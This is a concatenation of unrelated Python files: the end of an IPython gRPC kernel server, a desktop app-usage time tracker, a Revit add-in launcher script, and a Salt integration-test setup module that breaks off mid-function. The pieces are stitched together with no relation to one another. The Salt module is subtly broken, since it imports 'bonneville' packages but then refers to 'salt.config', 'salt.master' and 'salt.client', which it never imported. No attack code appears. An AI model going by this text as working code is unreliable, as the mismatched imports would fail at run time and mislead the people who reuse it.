# execution might get stuck there (we might open an issue on jupyter client):
# https://github.com/jupyter/jupyter_client/blob/master/jupyter_client/blocking/client.py#L323
while (t.is_alive() and self.isKernelAlive()) or not stream_reply_queue.empty():
# Sleep from time to time to reduce CPU usage.
# At worst this adds a 0.05 s delay to a batch of messages.
# Overall it improves performance.
time.sleep(0.05)
while not stream_reply_queue.empty():
yield stream_reply_queue.get()
# if kernel is not alive or thread is still alive, it means that we face an issue.
if not self.isKernelAlive() or t.is_alive():
yield ipython_pb2.ExecuteResponse(status=ipython_pb2.ERROR,
type=ipython_pb2.TEXT,
output="Ipython kernel has been stopped. Please check logs. It might be because of an out of memory issue.")
if payload_reply:
result = []
for payload in payload_reply[0]['content']['payload']:
if payload['data']['text/plain']:
result.append(payload['data']['text/plain'])
if result:
yield ipython_pb2.ExecuteResponse(status=ipython_pb2.SUCCESS,
type=ipython_pb2.TEXT,
output='\n'.join(result))
def cancel(self, request, context):
self._km.interrupt_kernel()
return ipython_pb2.CancelResponse()
def complete(self, request, context):
with self._lock:
reply = self._kc.complete(request.code, request.cursor, reply=True, timeout=None)
return ipython_pb2.CompletionResponse(matches=reply['content']['matches'])
def status(self, request, context):
return ipython_pb2.StatusResponse(status = self._status)
def isKernelAlive(self):
return self._km.is_alive()
def terminate(self):
self._km.shutdown_kernel()
def stop(self, request, context):
self.terminate()
return ipython_pb2.StopResponse()
def serve(port):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
ipython = IPython(server)
ipython_pb2_grpc.add_IPythonServicer_to_server(ipython, server)
server.add_insecure_port('[::]:' + port)
server.start()
ipython.start()
try:
while ipython.isKernelAlive():
time.sleep(5)
except KeyboardInterrupt:
print("interrupted")
finally:
print("shutdown")
# give the server 2 seconds for all in-flight requests to complete
server.stop(2)
ipython.terminate()
os._exit(0)
if __name__ == '__main__':
serve(sys.argv[1])
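# Usage sketch (an assumption, not part of the original file): the server is started
# with the gRPC port as its single argument, e.g.
#     python ipython_server.py 50053
# after which a client streams ExecuteResponse messages from the execute() RPC above.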
|
manager.py
|
from recorder import recorder
from threading import Thread
from trackable import trackable
from fileIO import fileInputOutput
import os
import time
class manager:
__isRecording = False
__toBeTracked = []
__myReader = None
__myRecorder = None
# might put it in a primer
def __init__(self,processFilePath,trackFilePath):
self.__myReader = fileInputOutput(processFilePath,trackFilePath)
self.__myRecorder = recorder(self.__myReader)
self.__createTrackableObjects()
#** creates trackable objects from the track data file entries, as long as they are currently set to be tracked!
def __createTrackableObject(self,line):
line = line.split("|")
if(line[0] == 'Y'):
temp = trackable(line[1],float(line[2]))
self.__toBeTracked.append(temp)
def __createTrackableObjects(self):
allAppsInFile = self.__myReader.getAllTrackedLines()
for line in allAppsInFile:
self.__createTrackableObject(line)
# ** Add a new application you want to track to the list of trackables and also into the track file (used as a database). By Default every newly added app is tracked.
def addNewTrackable(self,newApp):
if (len(newApp) == 0):
return
toBeAdded = "Y|"+ newApp +"|0"
self.__myReader.addNewOnTracked(toBeAdded)
self.__myReader.newReset(newApp)
temp = trackable(newApp,float("0"))
self.__toBeTracked.append(temp)
# ** Make a specific application trackable
def setTrackable(self,appName):
if(self.__myRecorder.isOn() is True):
return
allAppsInFile = self.__myReader.getAllTrackedLines()
for i,line in enumerate(allAppsInFile) :
temp = line.split("|")
if (temp[1] == appName):
line = 'Y|'+appName+"|"+temp[2]
allAppsInFile[i] = line
self.__myReader.overWriteTrackedLines(allAppsInFile)
self.__toBeTracked.clear()
self.__createTrackableObjects()
# ** Make a specific application untrackable (Change is made in the database)
def setUntrackable(self,appName):
if(self.__myRecorder.isOn() is True):
return
allAppsInFile = self.__myReader.getAllTrackedLines()
for i,line in enumerate(allAppsInFile):
temp = line.split("|")
if (temp[1] == appName):
line = 'N|'+appName+"|"+temp[2]
allAppsInFile[i] = line
self.__myReader.overWriteTrackedLines(allAppsInFile)
self.__toBeTracked.clear()
self.__createTrackableObjects()
#** Initiate the recording by running the recorder on a separate thread
def startrecording(self):
print("I am recording...")
if(self.__myRecorder.isOn() is False):
for app in self.__toBeTracked:
app.setForTrack()
t = Thread(target = self.__myRecorder.turnOnRecording, name="thread1",args=(self.__toBeTracked,))
t.start()
#** Stop the recording
def stoprecording(self):
print("I stopped...")
if(self.__myRecorder.isOn() is True):
for app in self.__toBeTracked:
self.__myReader.getProcesses()
isRunning = self.__myReader.isAppRunning(app.getName())
if (isRunning is True and app.getIsTracked() is True):
app.setForUpdate()
self.__myRecorder.turnOffRecording()
time.sleep(0.01)
self.__updateTimeOnData()
# This method reorganizes the app data and calls the reader/writer to overwrite the trackData file to reflect changes.
def __updateTimeOnData(self):
allAppsInFile = self.__myReader.getAllTrackedLines()
for i, line in enumerate(allAppsInFile):
temp = line.split("|")
trackedIndex = self.__isAppInSession(temp[1])
if(trackedIndex > -1):
getThis = self.__toBeTracked[trackedIndex].getTotalSecond()
allAppsInFile[i] = 'Y|'+temp[1]+'|' + str(self.__toBeTracked[trackedIndex].getTotalSecond())
if(i+1 != len(allAppsInFile)):
allAppsInFile[i] = allAppsInFile[i]+'\n'
self.__myReader.overWriteTrackedLines(allAppsInFile)
def __isAppInSession(self, appName):
for i, app in enumerate (self.__toBeTracked):
if (appName == app.getName()):
return i
return -1
def resetData(self,appName):
if(self.__myRecorder.isOn() is True):
return
allAppsInFile = self.__myReader.getAllTrackedLines()
for i, line in enumerate(allAppsInFile):
temp = line.split("|")
if (temp[1]==appName):
line = temp[0]+'|'+temp[1]+'|'+'0.0'
if (i != (len(allAppsInFile)-1)):
line = line + '\n'
allAppsInFile[i] = line
self.__myReader.overWriteTrackedLines(allAppsInFile)
self.__createTrackableObjects()
for app in self.__toBeTracked:
if(app.getName() == appName):
app.resetTotalSecond()
def printAll(self):
for x in self.__toBeTracked:
print(x.getName())
def getTrackedObjects(self):
return self.__toBeTracked
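# Illustrative note (an assumption, not part of the original file): each line of the
# track data file handled above is pipe-delimited as "<Y|N>|<app name>|<total seconds>",
# for example
#     Y|chrome.exe|3600.0
# where the first field marks whether the application is currently being tracked.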
|
ConnectionHostVerification.py
|
#Created by Damian Krzemiński, contact: krzemodam2@gmail.com
_debug_ = False
import sys
sys.path.append(_app_path_ + "\\PythonScripts")
sys.path.append(_app_path_ + "\\PythonScripts\\Lib")
from MainForm import MainForm
import threading
import time
import rvt
import clr
clr.AddReference("System.Collections")
import System.Collections.Generic
from System.Collections.Generic import List, Dictionary
from Autodesk.Revit.DB import *
from Autodesk.Revit.DB.Structure import *
from Autodesk.Revit.UI import *
import Autodesk.Revit.Creation
from Autodesk.Revit.Creation import *
uiapp = _command_data_.Application
app = uiapp.Application
uidoc = uiapp.ActiveUIDocument
doc = uidoc.Document
cdoc = doc.Create
rvt._event_path_.Location = "{}\\PythonScripts\\Connections\\ConnectionHostVerification_sub.py".format(_app_path_)
class Program(MainForm):
#set "console" class parameter to 1 for debug dialog, set 2 fore modeless dialog
console = 2
def Start(self):
#self.log([opt for opt in rvt._event_path_])
rvt._event_.Raise()
#exEvent.Dispose()
f = Program()
def start_form():
f.ShowDialog()
thread_operation = threading.Thread(target = start_form)
thread_operation.daemon = True
thread_operation.start()
|
__init__.py
|
'''
Set up the Salt integration test suite
'''
# Import Python libs
import re
import os
import sys
import time
import shutil
import pprint
import logging
import tempfile
import subprocess
import multiprocessing
from hashlib import md5
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SALT_LIBS = os.path.dirname(CODE_DIR)
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.case import ShellTestCase
from salttesting.mixins import CheckShellBinaryNameAndVersionMixIn
from salttesting.parser import PNUM, print_header, SaltTestcaseParser
from salttesting.helpers import ensure_in_syspath, RedirectStdStreams
# Update sys.path
ensure_in_syspath(CODE_DIR, SALT_LIBS)
# Import Salt libs
import bonneville
import bonneville.config
import bonneville.master
import bonneville.minion
import bonneville.runner
import bonneville.output
import bonneville.version
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
# Import 3rd-party libs
import yaml
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
PYEXEC = 'python{0}.{1}'.format(sys.version_info[0], sys.version_info[1])
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
TMP_CONF_DIR = os.path.join(TMP, 'config')
log = logging.getLogger(__name__)
def run_tests(TestCase, needs_daemon=True):
'''
Run integration tests for a chosen test case.
    The function uses optparse to set up the test environment.
'''
class TestcaseParser(SaltTestcaseParser):
def setup_additional_options(self):
self.add_option(
'--sysinfo',
default=False,
action='store_true',
help='Print some system information.'
)
self.output_options_group.add_option(
'--no-colors',
'--no-colours',
default=False,
action='store_true',
help='Disable colour printing.'
)
def run_testcase(self, testcase, needs_daemon=True):
if needs_daemon:
print('Setting up Salt daemons to execute tests')
with TestDaemon(self):
return SaltTestcaseParser.run_testcase(self, testcase)
return SaltTestcaseParser.run_testcase(self, testcase)
parser = TestcaseParser()
parser.parse_args()
if parser.run_testcase(TestCase, needs_daemon=needs_daemon) is False:
parser.finalize(1)
parser.finalize(0)
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = get_colors(self.parser.options.no_colors is False)
def __enter__(self):
'''
Start a master and minion
'''
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
self.master_opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
self.master_opts['user'] = running_tests_user
minion_config_path = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'minion'
)
self.minion_opts = salt.config.minion_config(minion_config_path)
self.minion_opts['user'] = running_tests_user
self.syndic_opts = salt.config.syndic_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'),
minion_config_path
)
self.syndic_opts['user'] = running_tests_user
#if sys.version_info < (2, 7):
# self.minion_opts['multiprocessing'] = False
self.sub_minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
self.sub_minion_opts['root_dir'] = os.path.join(TMP, 'subsalt')
self.sub_minion_opts['user'] = running_tests_user
#if sys.version_info < (2, 7):
# self.sub_minion_opts['multiprocessing'] = False
self.smaster_opts = salt.config.master_config(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
)
)
self.smaster_opts['user'] = running_tests_user
# Set up config options that require internal data
self.master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
self.master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
]
}
self.master_opts['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(
os.path.join(
FILES,
'ext.yaml'
)
)}
)
self.master_opts['extension_modules'] = os.path.join(INTEGRATION_TEST_DIR, 'files', 'extension_modules')
# clean up the old files
self._clean()
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
self.master_opts[optname] = optname_path
self.minion_opts[optname] = optname_path
self.sub_minion_opts[optname] = optname_path
verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
os.path.join(self.master_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.master_opts['cachedir'], 'jobs'),
os.path.join(self.smaster_opts['pki_dir'], 'minions'),
os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
os.path.join(self.smaster_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.smaster_opts['cachedir'], 'jobs'),
os.path.dirname(self.master_opts['log_file']),
self.minion_opts['extension_modules'],
self.sub_minion_opts['extension_modules'],
self.sub_minion_opts['pki_dir'],
self.master_opts['sock_dir'],
self.smaster_opts['sock_dir'],
self.sub_minion_opts['sock_dir'],
self.minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP
],
running_tests_user)
# Set up PATH to mockbin
self._enter_mockbin()
master = salt.master.Master(self.master_opts)
self.master_process = multiprocessing.Process(target=master.start)
self.master_process.start()
minion = salt.minion.Minion(self.minion_opts)
self.minion_process = multiprocessing.Process(target=minion.tune_in)
self.minion_process.start()
sub_minion = salt.minion.Minion(self.sub_minion_opts)
self.sub_minion_process = multiprocessing.Process(
target=sub_minion.tune_in
)
self.sub_minion_process.start()
smaster = salt.master.Master(self.smaster_opts)
self.smaster_process = multiprocessing.Process(target=smaster.start)
self.smaster_process.start()
syndic = salt.minion.Syndic(self.syndic_opts)
self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
self.syndic_process.start()
if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
from copy import deepcopy
try:
os.makedirs('/tmp/salttest/conf')
except OSError:
pass
master_opts = deepcopy(self.master_opts)
minion_opts = deepcopy(self.minion_opts)
master_opts.pop('conf_file', None)
minion_opts.pop('conf_file', None)
minion_opts.pop('grains', None)
minion_opts.pop('pillar', None)
open('/tmp/salttest/conf/master', 'w').write(
yaml.dump(master_opts)
)
open('/tmp/salttest/conf/minion', 'w').write(
yaml.dump(minion_opts)
)
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if self.parser.options.sysinfo:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
@property
def client(self):
'''
        Return a local client which will be used, for example, to ping and sync
        the test minions.
        This client is defined as a class attribute because its creation needs
        to be deferred to a later stage. If it were created on `__enter__`, as it
        previously was, it would not receive the master events.
'''
return salt.client.LocalClient(
mopts=self.master_opts
)
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
import integration
integration.SYNDIC = None
self.sub_minion_process.terminate()
self.sub_minion_process.join()
self.minion_process.terminate()
self.minion_process.join()
self.master_process.terminate()
self.master_process.join()
self.syndic_process.terminate()
self.syndic_process.join()
self.smaster_process.terminate()
self.smaster_process.join()
self._exit_mockbin()
self._clean()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
# Wait for minions to connect back
wait_minion_connections = multiprocessing.Process(
target=self.wait_for_minion_connections,
args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
)
wait_minion_connections.start()
wait_minion_connections.join()
wait_minion_connections.terminate()
if wait_minion_connections.exitcode > 0:
print(
'\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
**self.colors
)
)
return False
del wait_minion_connections
sync_needed = self.parser.options.clean
if self.parser.options.clean is False:
def sumfile(fpath):
# Since we will be do'in this for small files, it should be ok
fobj = fopen(fpath)
m = md5()
while True:
d = fobj.read(8096)
if not d:
break
m.update(d)
return m.hexdigest()
# Since we're not cleaning up, let's see if modules are already up
# to date so we don't need to re-sync them
modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
for fname in os.listdir(modules_dir):
if not fname.endswith('.py'):
continue
dfile = os.path.join(
'/tmp/salttest/cachedir/extmods/modules/', fname
)
if not os.path.exists(dfile):
sync_needed = True
break
sfile = os.path.join(modules_dir, fname)
if sumfile(sfile) != sumfile(dfile):
sync_needed = True
break
if sync_needed:
# Wait for minions to "sync_all"
sync_minions = multiprocessing.Process(
target=self.sync_minion_modules,
args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
)
sync_minions.start()
sync_minions.join()
if sync_minions.exitcode > 0:
return False
sync_minions.terminate()
del sync_minions
return True
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.parser.options.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
if os.path.isdir(TMP):
shutil.rmtree(TMP)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
if not running and job_finished is False:
                # Let's not have false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else:
sys.stdout.write(
'\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in running.items() if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
continue
expected_connections.remove(target)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else:
print(
'\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules(self, targets, timeout=120):
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s modules '
'(saltutil.sync_modules)'.format(
', '.join(targets),
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_modules',
expr_form='list',
timeout=9999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync modules. '
'Tests requiring these modules WILL fail'.format(**self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in rdata.items():
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} modules: '
'{1}'.format(
name, ', '.join(output['ret']), **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {RED_BOLD}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
class AdaptedConfigurationTestCaseMixIn(object):
__slots__ = ()
def get_config_dir(self):
integration_config_dir = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf'
)
if os.getuid() == 0:
# Running as root, the running user does not need to be updated
return integration_config_dir
for fname in os.listdir(integration_config_dir):
self.get_config_file_path(fname)
return TMP_CONF_DIR
def get_config_file_path(self, filename):
integration_config_file = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', filename
)
if os.getuid() == 0:
# Running as root, the running user does not need to be updated
return integration_config_file
if not os.path.isdir(TMP_CONF_DIR):
os.makedirs(TMP_CONF_DIR)
updated_config_path = os.path.join(TMP_CONF_DIR, filename)
if not os.path.isfile(updated_config_path):
self.__update_config(integration_config_file, updated_config_path)
return updated_config_path
def __update_config(self, source, dest):
if not os.path.isfile(dest):
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
configuration = yaml.load(open(source).read())
configuration['user'] = running_tests_user
open(dest, 'w').write(yaml.dump(configuration))
class SaltClientTestCaseMixIn(AdaptedConfigurationTestCaseMixIn):
_salt_client_config_file_name_ = 'master'
__slots__ = ('client', '_salt_client_config_file_name_')
@property
def client(self):
return salt.client.LocalClient(
self.get_config_file_path(self._salt_client_config_file_name_)
)
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
        known_to_return_none = (
'file.chown', 'file.chgrp', 'ssh.recv_known_host'
)
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
        elif orig[minion_tgt] is None and function not in known_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
return orig[minion_tgt]
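    # Hedged usage sketch (illustrative only, not part of the original file):
    # a test method on a ModuleCase subclass might call a remote execution
    # module and assert on the conditioned return, e.g.:
    #
    #     ret = self.run_function('test.echo', ['hello'])
    #     self.assertEqual(ret, 'hello')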
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
return self.run_function('state.single', [function], **kwargs)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
self.get_config_file_path('minion')
)
@property
def sub_minion_opts(self):
'''
        Return the options used for the sub_minion
'''
return salt.config.minion_config(
self.get_config_file_path('sub_minion')
)
@property
def master_opts(self):
'''
        Return the options used for the master
'''
return salt.config.master_config(
self.get_config_file_path('master')
)
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=25)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(AdaptedConfigurationTestCaseMixIn, ShellTestCase):
'''
Execute a test for a shell command
'''
_code_dir_ = CODE_DIR
_script_dir_ = SCRIPT_DIR
_python_executable_ = PYEXEC
def run_salt(self, arg_str, with_retcode=False):
'''
Execute salt
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt', arg_str, with_retcode=with_retcode)
def run_run(self, arg_str, with_retcode=False):
'''
Execute salt-run
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-run', arg_str, with_retcode=with_retcode)
def run_run_plus(self, fun, options='', *arg):
'''
        Execute the salt-run CLI and the salt runner function directly, and
        return the data from each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg))
)
opts = salt.config.master_config(
self.get_config_file_path('master')
)
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False, with_retcode=False):
'''
Execute salt-key
'''
arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script(
'salt-key',
arg_str,
catch_stderr=catch_stderr,
with_retcode=with_retcode
)
def run_cp(self, arg_str, with_retcode=False):
'''
Execute salt-cp
'''
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-cp', arg_str, with_retcode=with_retcode)
def run_call(self, arg_str, with_retcode=False):
arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
return self.run_script('salt-call', arg_str, with_retcode=with_retcode)
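    # Hedged examples (illustrative only, not part of the original file) of the
    # shell helpers above, as they might appear inside a ShellCase test method:
    #
    #     data = self.run_salt('"minion" test.ping')   # drives the ``salt`` CLI
    #     keys = self.run_key('-L')                    # drives the ``salt-key`` CLI
    #     out  = self.run_call('test.ping')            # drives the ``salt-call`` CLI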
class ShellCaseCommonTestsMixIn(CheckShellBinaryNameAndVersionMixIn):
_call_binary_expected_version_ = salt.__version__
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__, SaltStackVersion
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe', '--tags', '--match', 'v[0-9]*'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: {0!r}'.format(
err
)
)
parsed_version = SaltStackVersion.parse(out)
if parsed_version.info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. This test '
'would fail. Parsed({0!r}) < Expected({1!r})'.format(
parsed_version.info, __version_info__
)
)
elif parsed_version.info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version.string, out)
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
            raise AssertionError(
                '{0} is equal to {1}. Salt returned an empty dictionary.'.format(
                    ret, {}
                )
            )
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, basestring):
# If it's a basestring , make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in ret.values():
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
